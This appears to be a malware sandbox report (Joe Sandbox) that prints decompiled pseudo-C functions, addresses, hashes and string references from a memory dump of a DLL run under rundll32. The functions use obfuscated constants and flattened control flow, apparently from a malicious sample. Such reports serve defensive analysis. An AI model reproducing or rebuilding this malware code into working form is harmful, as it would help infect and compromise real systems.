String ID: k2$rZ$|s?
API String ID: 0-1348797666
Opcode ID: 1a504f0c04b87af0b1b48271f2f1a4297b55bdfd64aa91b8cb3f8916695204b1
Instruction ID: c5a9857de1bd72a55434b072a893e00a77e4adad4e3d5eb919c6f6467bcc56a9
Opcode Fuzzy Hash: 1a504f0c04b87af0b1b48271f2f1a4297b55bdfd64aa91b8cb3f8916695204b1
Instruction Fuzzy Hash: 84610E71109341AFD358CF25C88981FBBE1FB98788F50591DF5969A260D3B2CA49CF93

Uniqueness

Uniqueness Score: -1.00%

Function 1001DB25, Relevance: 3.9, Strings: 3, Instructions: 142
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E1001DB25(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* _t118;
				void* _t135;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				void* _t144;
				void* _t163;
				signed int* _t166;

				_push(_a16);
				_t162 = _a4;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t118);
				_v96 = 0x6541;
				_t166 =  &(( &_v96)[6]);
				_v96 = _v96 ^ 0x91bfb37d;
				_v96 = _v96 >> 0x10;
				_t163 = 0;
				_v96 = _v96 << 0xe;
				_t144 = 0xd16dbf6;
				_v96 = _v96 ^ 0x246feaa2;
				_v80 = 0xafef;
				_v80 = _v80 + 0xd5f0;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x000020f9;
				_v60 = 0x3fa;
				_v60 = _v60 << 8;
				_v60 = _v60 ^ 0x0003a875;
				_v68 = 0xdac3;
				_v68 = _v68 >> 4;
				_t138 = 0x79;
				_v68 = _v68 * 0x37;
				_v68 = _v68 ^ 0x0002ab2a;
				_v56 = 0xacb2;
				_v56 = _v56 << 3;
				_v56 = _v56 ^ 0x00056a81;
				_v72 = 0x451e;
				_v72 = _v72 << 0xa;
				_v72 = _v72 >> 1;
				_v72 = _v72 ^ 0x008a68a2;
				_v76 = 0xa9b5;
				_v76 = _v76 ^ 0x71c268bb;
				_v76 = _v76 >> 0xb;
				_v76 = _v76 ^ 0x000e50b8;
				_v84 = 0x733c;
				_v84 = _v84 + 0xffff2d0a;
				_v84 = _v84 | 0xc6f06430;
				_v84 = _v84 + 0xffffe838;
				_v84 = _v84 ^ 0xffffb7ce;
				_v88 = 0xd1fe;
				_v88 = _v88 / _t138;
				_v88 = _v88 | 0xc6561511;
				_t139 = 0x35;
				_v88 = _v88 / _t139;
				_v88 = _v88 ^ 0x03be11ae;
				_v64 = 0xb503;
				_v64 = _v64 ^ 0x4b2bbc6a;
				_v64 = _v64 + 0xffffbb02;
				_v64 = _v64 ^ 0x4b2ab619;
				_v92 = 0x25d2;
				_t140 = 0x57;
				_v92 = _v92 * 0x42;
				_v92 = _v92 / _t140;
				_t141 = 0x2f;
				_v92 = _v92 / _t141;
				_v92 = _v92 ^ 0x00006e4e;
				do {
					while(_t144 != 0xd16dbf6) {
						if(_t144 == 0x14ed0f49) {
							__eflags = E1001D290(_v84, _v88, _v64, _t162 + 8, _v92,  &_v52);
							_t163 =  !=  ? 1 : _t163;
						} else {
							if(_t144 == 0x2713230a) {
								_t135 = E10009899(_t162, _v68, __eflags,  &_v52, _v56, _v72, _v76);
								_t166 =  &(_t166[4]);
								__eflags = _t135;
								if(__eflags != 0) {
									_t144 = 0x14ed0f49;
									continue;
								}
							} else {
								if(_t144 != 0x2ae8b971) {
									goto L9;
								} else {
									E1001F3E9(_v96, _v80, _v60, _a12,  &_v52);
									_t166 =  &(_t166[3]);
									_t144 = 0x2713230a;
									continue;
								}
							}
						}
						L12:
						return _t163;
					}
					_t144 = 0x2ae8b971;
					L9:
					__eflags = _t144 - 0x88de44a;
				} while (__eflags != 0);
				goto L12;
			}

0x1001db2c
0x1001db33
0x1001db37
0x1001db3e
0x1001db45
0x1001db46
0x1001db47
0x1001db48
0x1001db4d
0x1001db55
0x1001db58
0x1001db62
0x1001db67
0x1001db69
0x1001db6e
0x1001db73
0x1001db7b
0x1001db83
0x1001db8b
0x1001db90
0x1001db98
0x1001dba0
0x1001dba5
0x1001dbad
0x1001dbb5
0x1001dbc1
0x1001dbc4
0x1001dbc8
0x1001dbd0
0x1001dbd8
0x1001dbdd
0x1001dbe5
0x1001dbed
0x1001dbf2
0x1001dbf6
0x1001dbfe
0x1001dc06
0x1001dc0e
0x1001dc13
0x1001dc1b
0x1001dc23
0x1001dc2b
0x1001dc33
0x1001dc3b
0x1001dc43
0x1001dc53
0x1001dc57
0x1001dc63
0x1001dc68
0x1001dc6e
0x1001dc76
0x1001dc7e
0x1001dc86
0x1001dc8e
0x1001dc96
0x1001dca3
0x1001dca6
0x1001dcb2
0x1001dcba
0x1001dcbd
0x1001dcc6
0x1001dcd3
0x1001dcd3
0x1001dcdd
0x1001dd69
0x1001dd6b
0x1001dcdf
0x1001dce5
0x1001dd29
0x1001dd2e
0x1001dd31
0x1001dd33
0x1001dd35
0x00000000
0x1001dd35
0x1001dce7
0x1001dce9
0x00000000
0x1001dceb
0x1001dd03
0x1001dd08
0x1001dd0b
0x00000000
0x1001dd0b
0x1001dce9
0x1001dce5
0x1001dd6f
0x1001dd77
0x1001dd77
0x1001dd39
0x1001dd3b
0x1001dd3b
0x1001dd3b
0x00000000

Strings

Nn, xrefs: 1001DCC6
<s, xrefs: 1001DC1B
Ae, xrefs: 1001DB4D

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: <s$Ae$Nn
API String ID: 0-1679991533
Opcode ID: 92a5fa941ec84b2a13816d9790ac9f10e8bf9b01ff2aa242d1ce98f0185b00fe
Instruction ID: a6ffe0389ab2164942154368da0f3f4b89edecd288a42e9cb3f2d23efd3a417b
Opcode Fuzzy Hash: 92a5fa941ec84b2a13816d9790ac9f10e8bf9b01ff2aa242d1ce98f0185b00fe
Instruction Fuzzy Hash: 995176712083419FD358EF21D88951BBBE1FBC8348F508A1DF59996260D7B5CA49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 10010F6D, Relevance: 3.9, Strings: 3, Instructions: 125
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10010F6D() {
				signed char _v2;
				signed int _v276;
				signed int _v280;
				char _v284;
				signed short _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				void* _t107;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				intOrPtr _t123;
				signed int* _t125;

				_t125 =  &_v368;
				_v336 = 0x6cd7e4;
				_v332 = 0x3eb088;
				_t107 = 0x11f8fc3e;
				_t123 = 0;
				_v328 = 0;
				_v324 = 0;
				_v340 = 0x4b20;
				_v340 = _v340 | 0xad173eb8;
				_v340 = _v340 ^ 0xad171b79;
				_v368 = 0x5c5a;
				_v368 = _v368 | 0x9193e072;
				_v368 = _v368 ^ 0x84c7a0cb;
				_t119 = 0x62;
				_v368 = _v368 / _t119;
				_v368 = _v368 ^ 0x0037af10;
				_v352 = 0x141d;
				_v352 = _v352 + 0xbd3d;
				_t120 = 0x7c;
				_v352 = _v352 * 7;
				_v352 = _v352 ^ 0x0005e092;
				_v344 = 0x5f9b;
				_v344 = _v344 | 0x8244af57;
				_v344 = _v344 ^ 0x8244aa36;
				_v360 = 0xe6d9;
				_v360 = _v360 + 0xa592;
				_v360 = _v360 / _t120;
				_t121 = 0x1b;
				_v360 = _v360 * 0x3c;
				_v360 = _v360 ^ 0x0000cf96;
				_v356 = 0x3abe;
				_v356 = _v356 >> 0x10;
				_v356 = _v356 >> 6;
				_v356 = _v356 ^ 0x00000525;
				_v364 = 0x1f65;
				_v364 = _v364 >> 6;
				_v364 = _v364 * 0x16;
				_v364 = _v364 | 0xfb440427;
				_v364 = _v364 ^ 0xfb445ef1;
				_v348 = 0x48;
				_v348 = _v348 / _t121;
				_v348 = _v348 ^ 0x0000083a;
				do {
					while(_t107 != 0x2ebf197) {
						if(_t107 == 0x11f8fc3e) {
							_t107 = 0x2ebf197;
							continue;
						} else {
							if(_t107 == 0x13d7564d) {
								_t107 = 0x32df2d5c;
								_t123 = _t123 + (_v2 & 0x000000ff) * 0x186a0;
								continue;
							} else {
								if(_t107 == 0x2725b2a4) {
									E10008EB8(_v360, _v356,  &_v320, _v364, _v348);
									_t125 =  &(_t125[3]);
									_t107 = 0x13d7564d;
									continue;
								} else {
									if(_t107 == 0x2976fc0f) {
										_t123 = _t123 + (_v320 & 0x0000ffff);
									} else {
										if(_t107 == 0x2ab6fad8) {
											_t107 = 0x2976fc0f;
											_t123 = _t123 + _v276 * 0x64;
											continue;
										} else {
											if(_t107 != 0x32df2d5c) {
												goto L14;
											} else {
												_t107 = 0x2ab6fad8;
												_t123 = _t123 + _v280 * 0x3e8;
												continue;
											}
										}
									}
								}
							}
						}
						L17:
						return _t123;
					}
					_v284 = 0x11c;
					E10018EA4(_v340, _v368,  &_v284, _v352, _v344);
					_t125 =  &(_t125[3]);
					_t107 = 0x2725b2a4;
					L14:
				} while (_t107 != 0x1e073579);
				goto L17;
			}

0x10010f6d
0x10010f73
0x10010f7d
0x10010f85
0x10010f8d
0x10010f94
0x10010f9d
0x10010fa1
0x10010fa9
0x10010fb1
0x10010fb9
0x10010fc1
0x10010fc9
0x10010fd8
0x10010fdd
0x10010fe3
0x10010feb
0x10010ff3
0x10011000
0x10011003
0x10011007
0x1001100f
0x10011017
0x1001101f
0x10011027
0x1001102f
0x1001103f
0x10011048
0x10011049
0x1001104d
0x10011055
0x1001105d
0x10011062
0x10011067
0x1001106f
0x10011077
0x10011081
0x10011085
0x1001108d
0x10011095
0x100110a8
0x100110ac
0x100110b4
0x100110b4
0x100110c2
0x10011143
0x00000000
0x100110c4
0x100110ca
0x10011131
0x1001113c
0x00000000
0x100110cc
0x100110d2
0x1001111a
0x1001111f
0x10011122
0x00000000
0x100110d4
0x100110d6
0x10011187
0x100110dc
0x100110de
0x100110ff
0x10011101
0x00000000
0x100110e0
0x100110e6
0x00000000
0x100110ec
0x100110f4
0x100110f6
0x00000000
0x100110f6
0x100110e6
0x100110de
0x100110d6
0x100110d2
0x100110ca
0x1001118a
0x10011195
0x10011195
0x10011152
0x10011167
0x1001116c
0x1001116f
0x10011174
0x10011174
0x00000000

Strings

K, xrefs: 10010FA1
H, xrefs: 10011095
Z\, xrefs: 10010FB9

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: K$H$Z\
API String ID: 0-1080206182
Opcode ID: 7acbd81a9cb121969d6a9ac1592260c1e46ce6c2f983d3fe9c9f259f75efb378
Instruction ID: 3bc7b4ca0c7fcb2c5b05920913665c9c43f334923cd28bf2cbd3076ac86a8cde
Opcode Fuzzy Hash: 7acbd81a9cb121969d6a9ac1592260c1e46ce6c2f983d3fe9c9f259f75efb378
Instruction Fuzzy Hash: D7516771908341DFD319CE22D94545FBBE1EBC8748F108A1EF586AA260D3B5CA89CF97

Uniqueness

Uniqueness Score: -1.00%

Function 1001654F, Relevance: 3.9, Strings: 3, Instructions: 122
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E1001654F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				char _v592;
				void* _t137;
				signed int _t155;
				signed int _t156;
				signed int _t157;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t137);
				_v68 = _v68 & 0x00000000;
				_v72 = 0x40327f;
				_v36 = 0xc85d;
				_v36 = _v36 ^ 0x66282df1;
				_v36 = _v36 << 7;
				_v36 = _v36 ^ 0x1472a435;
				_v64 = 0xf491;
				_v64 = _v64 + 0xa329;
				_v64 = _v64 ^ 0x0001adca;
				_v40 = 0xc364;
				_v40 = _v40 >> 8;
				_v40 = _v40 | 0x488121d4;
				_v40 = _v40 ^ 0x48816408;
				_v52 = 0x6da2;
				_v52 = _v52 >> 1;
				_v52 = _v52 ^ 0x0000495a;
				_v8 = 0x312a;
				_v8 = _v8 + 0xffffef42;
				_t155 = 0x2c;
				_v8 = _v8 * 0x65;
				_v8 = _v8 + 0xce6d;
				_v8 = _v8 ^ 0x000de244;
				_v20 = 0x8561;
				_v20 = _v20 | 0x5ebc884e;
				_v20 = _v20 + 0x1144;
				_v20 = _v20 + 0xfffffd3c;
				_v20 = _v20 ^ 0x5ebcfa0f;
				_v12 = 0x1c9b;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 / _t155;
				_v12 = _v12 + 0x2960;
				_v12 = _v12 ^ 0x00001be2;
				_v60 = 0x3552;
				_t156 = 0x2b;
				_v60 = _v60 / _t156;
				_v60 = _v60 ^ 0x00001bfb;
				_v24 = 0xfa61;
				_v24 = _v24 >> 4;
				_v24 = _v24 | 0xfe7fc8bf;
				_v24 = _v24 ^ 0xfe7fec18;
				_v44 = 0xf8e3;
				_t157 = 0x73;
				_v44 = _v44 * 0x4c;
				_v44 = _v44 ^ 0x0049ee51;
				_v16 = 0x71dd;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 << 0xd;
				_v16 = _v16 * 0xd;
				_v16 = _v16 ^ 0x0016ae67;
				_v56 = 0x9b34;
				_v56 = _v56 / _t157;
				_v56 = _v56 ^ 0x000036fa;
				_v28 = 0xc6c;
				_v28 = _v28 + 0xfffffa1a;
				_v28 = _v28 + 0xffff7ee3;
				_v28 = _v28 ^ 0xffff83ef;
				_v48 = 0x101f;
				_v48 = _v48 | 0x367cb3d5;
				_v48 = _v48 ^ 0x367cc432;
				_v32 = 0x8972;
				_v32 = _v32 + 0x5a70;
				_v32 = _v32 ^ 0x29e9990a;
				_v32 = _v32 ^ 0x29e93145;
				_push(0x100015f0);
				_push(_v40);
				E10013D3D(E1001BF25(_v36, _v64, _v32), _v32, _v52, _v8,  &_v592, _v20, _v36, _v12);
				E1001C5F7(_v60, _v24, _v44, _v16, _t148);
				return E10003CA0(_v56, _v28, _v48,  &_v592, _v32);
			}

0x10016559
0x1001655c
0x1001655f
0x10016560
0x10016561
0x10016566
0x1001656c
0x10016573
0x1001657a
0x10016581
0x10016585
0x1001658c
0x10016593
0x1001659a
0x100165a1
0x100165a8
0x100165ac
0x100165b3
0x100165ba
0x100165c1
0x100165c4
0x100165cb
0x100165d2
0x100165df
0x100165e2
0x100165e5
0x100165ec
0x100165f3
0x100165fa
0x10016601
0x10016608
0x1001660f
0x10016616
0x1001661d
0x10016628
0x1001662b
0x10016632
0x10016639
0x10016643
0x10016648
0x1001664d
0x10016654
0x1001665b
0x1001665f
0x10016666
0x1001666d
0x10016678
0x10016679
0x1001667c
0x10016683
0x1001668a
0x1001668e
0x10016696
0x10016699
0x100166a0
0x100166ac
0x100166af
0x100166b6
0x100166bd
0x100166c4
0x100166cb
0x100166d2
0x100166d9
0x100166e0
0x100166e7
0x100166ee
0x100166f5
0x100166fc
0x10016703
0x10016708
0x10016734
0x10016746
0x1001676a

Strings

E1), xrefs: 100166FC
D, xrefs: 100165EC
QI, xrefs: 1001667C

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: D$E1)$QI
API String ID: 0-3224676359
Opcode ID: de472776899f0c55f1eb6eaae90afa3064a2a91ca96fd091b97d902bbcfec4df
Instruction ID: 4748c6fc59a3130118217356d11503de5a80fd968bd88dd6c5efbc71458b5f5e
Opcode Fuzzy Hash: de472776899f0c55f1eb6eaae90afa3064a2a91ca96fd091b97d902bbcfec4df
Instruction Fuzzy Hash: 7051DE75D0120DABEF08CFA5D98A8EEBBB2FF04314F208159E415B62A0D7B95A45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1000213E, Relevance: 3.9, Strings: 3, Instructions: 107
COMMONCrypto

Download Yara Rule

C-Code - Quality: 63%

			E1000213E(intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				void* _t117;
				void* _t119;
				intOrPtr* _t120;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				intOrPtr* _t138;

				_v52 = _v52 & 0x00000000;
				_v56 = 0x538da4;
				_v28 = 0x44a2;
				_v28 = _v28 + 0xffff49a8;
				_v28 = _v28 ^ 0x9ec4eed9;
				_v28 = _v28 ^ 0x613b19df;
				_v24 = 0xfb1d;
				_v24 = _v24 | 0x73dd884d;
				_v24 = _v24 >> 0x10;
				_v24 = _v24 ^ 0x000060fc;
				_v20 = 0x4538;
				_v20 = _v20 << 1;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x0000423d;
				_v16 = 0x1a69;
				_v16 = _v16 + 0x19e4;
				_v16 = _v16 << 6;
				_t123 = 0x59;
				_v16 = _v16 * 0x7f;
				_v16 = _v16 ^ 0x067cf58b;
				_v12 = 0x7ce6;
				_v12 = _v12 | 0x92d22600;
				_v12 = _v12 >> 3;
				_v12 = _v12 | 0x69c09952;
				_v12 = _v12 ^ 0x7bda88d4;
				_v8 = 0xdbf1;
				_v8 = _v8 >> 2;
				_t138 = _a4;
				_v8 = _v8 * 0x21;
				_t124 = 0x64;
				_v8 = _v8 / _t123;
				_v8 = _v8 ^ 0x00003399;
				_v44 = 0x6316;
				_v44 = _v44 / _t124;
				_v44 = _v44 ^ 0x000016b9;
				_v40 = 0xc759;
				_v40 = _v40 << 5;
				_v40 = _v40 | 0x59fc130f;
				_v40 = _v40 ^ 0x59fcaabc;
				_v36 = 0xd1fd;
				_t125 = 0x6d;
				_v36 = _v36 / _t125;
				_v36 = _v36 ^ 0x863f9c53;
				_v36 = _v36 ^ 0x863f9a9b;
				_v32 = 0x7363;
				_v32 = _v32 + 0xffffb442;
				_v32 = _v32 + 0xab3e;
				_v32 = _v32 ^ 0x0000a443;
				_v48 = 0x2890;
				_v48 = _v48 * 0x6e;
				_v48 = _v48 ^ 0x00113212;
				_t117 =  *((intOrPtr*)(_t138 + 0x1c))( *_t138, 1, 0);
				_t145 = _t117;
				if(_t117 != 0) {
					_push(_v20);
					_push(_v24);
					_t119 = E10012164(0x10001338, _v28, _t145);
					_t140 = _t119;
					_push(_t119);
					_push(_v44);
					_push( *_t138);
					_push(_v8);
					_t120 = E10003892(_v16, _v12);
					if(_t120 != 0) {
						 *_t120();
					}
					E1001C5F7(_v40, _v36, _v32, _v48, _t140);
				}
				return 0;
			}

0x10002144
0x1000214a
0x10002151
0x10002158
0x1000215f
0x10002166
0x1000216d
0x10002174
0x1000217b
0x1000217f
0x10002186
0x1000218d
0x10002190
0x10002193
0x1000219a
0x100021a1
0x100021a8
0x100021b3
0x100021b6
0x100021b9
0x100021c0
0x100021c7
0x100021ce
0x100021d2
0x100021d9
0x100021e0
0x100021e7
0x100021ef
0x100021f2
0x100021fa
0x100021fb
0x10002200
0x10002207
0x10002215
0x1000221a
0x10002221
0x10002228
0x1000222c
0x10002233
0x1000223a
0x10002244
0x10002249
0x1000224c
0x10002253
0x1000225a
0x10002261
0x10002268
0x1000226f
0x10002276
0x10002283
0x10002286
0x1000228f
0x10002292
0x10002294
0x10002297
0x1000229f
0x100022a5
0x100022aa
0x100022ac
0x100022ad
0x100022b0
0x100022b2
0x100022bb
0x100022c5
0x100022c7
0x100022c7
0x100022d6
0x100022de
0x100022e5

Strings

cs, xrefs: 1000225A
|, xrefs: 100021C0
=B, xrefs: 10002193

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: =B$cs$|
API String ID: 0-3098575777
Opcode ID: 26e771be288bcedb70c4e1769d7f3287c900998a71bd65c4af8e96d7d77837dd
Instruction ID: f3f3b864e56cb41531de165bc9f4fd19ac00324e8386bf07003281ad5c508310
Opcode Fuzzy Hash: 26e771be288bcedb70c4e1769d7f3287c900998a71bd65c4af8e96d7d77837dd
Instruction Fuzzy Hash: 39512371D00209EBEF08CFA1C94A6EEBBB2FB08314F208059D511B6290D7BA5B54CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 10005EB9, Relevance: 3.9, Strings: 3, Instructions: 106
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E10005EB9(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _t95;
				intOrPtr _t97;
				intOrPtr _t106;
				signed int _t107;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t120;
				intOrPtr* _t121;
				void* _t122;
				intOrPtr _t123;

				_v28 = 0x51db;
				_v28 = _v28 * 0x56;
				_v28 = _v28 ^ 0xf2cb6318;
				_v28 = _v28 ^ 0xf2d01fca;
				_v12 = 0x641f;
				_t107 = 0x36;
				_v12 = _v12 * 0x49;
				_v12 = _v12 ^ 0x001cda68;
				_v24 = 0xc595;
				_v24 = _v24 | 0x40e4949d;
				_v24 = _v24 >> 6;
				_v24 = _v24 ^ 0x0103f279;
				_v36 = 0xae24;
				_v36 = _v36 >> 0xe;
				_v36 = _v36 << 1;
				_v36 = _v36 << 0xe;
				_v36 = _v36 ^ 0x0001302d;
				_v20 = 0x229b;
				_v20 = _v20 | 0xaeee7ef1;
				_v20 = _v20 ^ 0xaeee687d;
				_v8 = 0x637e;
				_v8 = _v8 / _t107;
				_v8 = _v8 ^ 0x000003e0;
				_v4 = 0xedda;
				_v4 = _v4 | 0x32cb1c6d;
				_v4 = _v4 ^ 0x32cbfe7d;
				_v16 = 0xace9;
				_v16 = _v16 * 3;
				_v16 = _v16 >> 3;
				_v16 = _v16 ^ 0x00006a5d;
				_v32 = 0xe450;
				_v32 = _v32 | 0xfff2f3f7;
				_v32 = _v32 ^ 0x3a9b7228;
				_v32 = _v32 ^ 0xc569ebde;
				_t95 = E10014237();
				_t120 = _a4;
				_t122 = _t95;
				_v28 = 0x89bb;
				_v28 = _v28 ^ 0xf4290def;
				_v28 = _v28 + 0xffff042c;
				_v28 = _v28 ^ 0xf4288880;
				_t124 = _t120 + 0x24;
				_t106 = E1001C424(_t120 + 0x24, _v36);
				_t97 =  *((intOrPtr*)(_t120 + 8));
				if(_t97 != _v28 && _t97 != _t122) {
					_t110 =  *((intOrPtr*)(_t120 + 0x18));
					if(_t110 != _v28 && _t110 != _t122) {
						_t121 = _a8;
						_t111 =  *_t121;
						if(E10008B2D(_t111, _t106) == 0) {
							_push(_t111);
							_t123 = E100157E8(0x234);
							if(_t123 != 0) {
								_t83 = _t123 + 0x2c; // 0x2c
								E10015891(_t124, _t83, _v4, _v16, _v32);
								 *((intOrPtr*)(_t123 + 0x24)) = _t106;
								 *((intOrPtr*)(_t123 + 0x1c)) =  *_t121;
								 *_t121 = _t123;
							}
						}
					}
				}
				return 1;
			}

0x10005ebc
0x10005ecf
0x10005ed3
0x10005edb
0x10005ee3
0x10005ef2
0x10005ef3
0x10005ef7
0x10005eff
0x10005f07
0x10005f0f
0x10005f14
0x10005f1c
0x10005f24
0x10005f29
0x10005f2d
0x10005f32
0x10005f3a
0x10005f42
0x10005f4a
0x10005f52
0x10005f60
0x10005f64
0x10005f6c
0x10005f74
0x10005f7c
0x10005f84
0x10005f91
0x10005f95
0x10005f9a
0x10005fa2
0x10005faa
0x10005fb2
0x10005fba
0x10005fca
0x10005fcf
0x10005fd3
0x10005fd5
0x10005fdd
0x10005fe5
0x10005fed
0x10005ff5
0x10006007
0x10006009
0x10006011
0x10006017
0x1000601e
0x10006024
0x1000602a
0x10006033
0x1000603d
0x10006048
0x1000604d
0x10006053
0x10006060
0x10006065
0x1000606d
0x10006070
0x10006070
0x1000604d
0x10006033
0x1000601e
0x1000607c

Strings

~c, xrefs: 10005F52
P, xrefs: 10005FA2
]j, xrefs: 10005F9A

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: P$]j$~c
API String ID: 0-2734922740
Opcode ID: 2ddae0401af973571d1696ec4368973d25313382c46e7bfc25bb53ccb91cfd1f
Instruction ID: ea7cc22da0d58e888ac6ae18cd3838caf37ee5c895773eb993b6b9e4d83255ea
Opcode Fuzzy Hash: 2ddae0401af973571d1696ec4368973d25313382c46e7bfc25bb53ccb91cfd1f
Instruction Fuzzy Hash: 9B41E2755083429FD358CF21D58641BFBE1FB88798F104A1DF4DAA6264C374EA89CF86

Uniqueness

Uniqueness Score: -1.00%

Function 10008816, Relevance: 3.8, Strings: 3, Instructions: 99
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10008816(intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v116;
				void* _t108;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				intOrPtr* _t133;

				_v28 = 0x78e3;
				_v28 = _v28 | 0x7135a14a;
				_v28 = _v28 + 0x1554;
				_v28 = _v28 ^ 0x7136354d;
				_v8 = 0x9c2;
				_t117 = 0x5f;
				_v8 = _v8 / _t117;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0xd7261730;
				_v8 = _v8 ^ 0xd7260392;
				_v24 = 0xd04a;
				_v24 = _v24 + 0xa8bc;
				_v24 = _v24 << 0xf;
				_v24 = _v24 ^ 0xbc833dba;
				_v40 = 0x60a0;
				_v40 = _v40 >> 0xb;
				_v40 = _v40 ^ 0x000011f0;
				_v32 = 0x3bcc;
				_v32 = _v32 >> 3;
				_v32 = _v32 << 0xa;
				_v32 = _v32 ^ 0x001da571;
				_v20 = 0xf201;
				_t118 = 0x6a;
				_v20 = _v20 / _t118;
				_v20 = _v20 | 0xe2b46b61;
				_t119 = 0x7b;
				_t133 = _a4;
				_v20 = _v20 / _t119;
				_v20 = _v20 ^ 0x01d7ce84;
				_v36 = 0x5b49;
				_v36 = _v36 * 0x73;
				_v36 = _v36 ^ 0x48cc9d1b;
				_v36 = _v36 ^ 0x48e5c7c4;
				_v16 = 0xd187;
				_v16 = _v16 << 5;
				_v16 = _v16 | 0x08003ce7;
				_v16 = _v16 + 0xe504;
				_v16 = _v16 ^ 0x081b14b1;
				_v12 = 0x85bb;
				_v12 = _v12 + 0xcd9e;
				_v12 = _v12 | 0x9f7708de;
				_v12 = _v12 ^ 0x14303fed;
				_v12 = _v12 ^ 0x8b4777c9;
				_t108 =  *((intOrPtr*)(_t133 + 0x1c))( *_t133, 1, 0);
				_t137 = _t108;
				if(_t108 != 0) {
					E10014E4B( &_v116, _v28, _v8, _v24);
					_v52 =  &_v116;
					_v48 = E100093FA(_v40, _v32, _t137,  &_v44);
					 *((intOrPtr*)(_t133 + 0x1c))( *_t133, 0xa,  &_v52);
					E1001C5F7(_v20, _v36, _v16, _v12, _v48);
				}
				return 0;
			}

0x1000881c
0x10008825
0x1000882c
0x10008833
0x1000883a
0x10008847
0x1000884c
0x10008851
0x10008855
0x1000885c
0x10008863
0x1000886a
0x10008871
0x10008875
0x1000887c
0x10008883
0x10008887
0x1000888e
0x10008895
0x10008899
0x1000889d
0x100088a4
0x100088ae
0x100088b3
0x100088b8
0x100088c2
0x100088c5
0x100088c8
0x100088cb
0x100088d2
0x100088e1
0x100088e4
0x100088eb
0x100088f2
0x100088f9
0x100088fd
0x10008904
0x1000890b
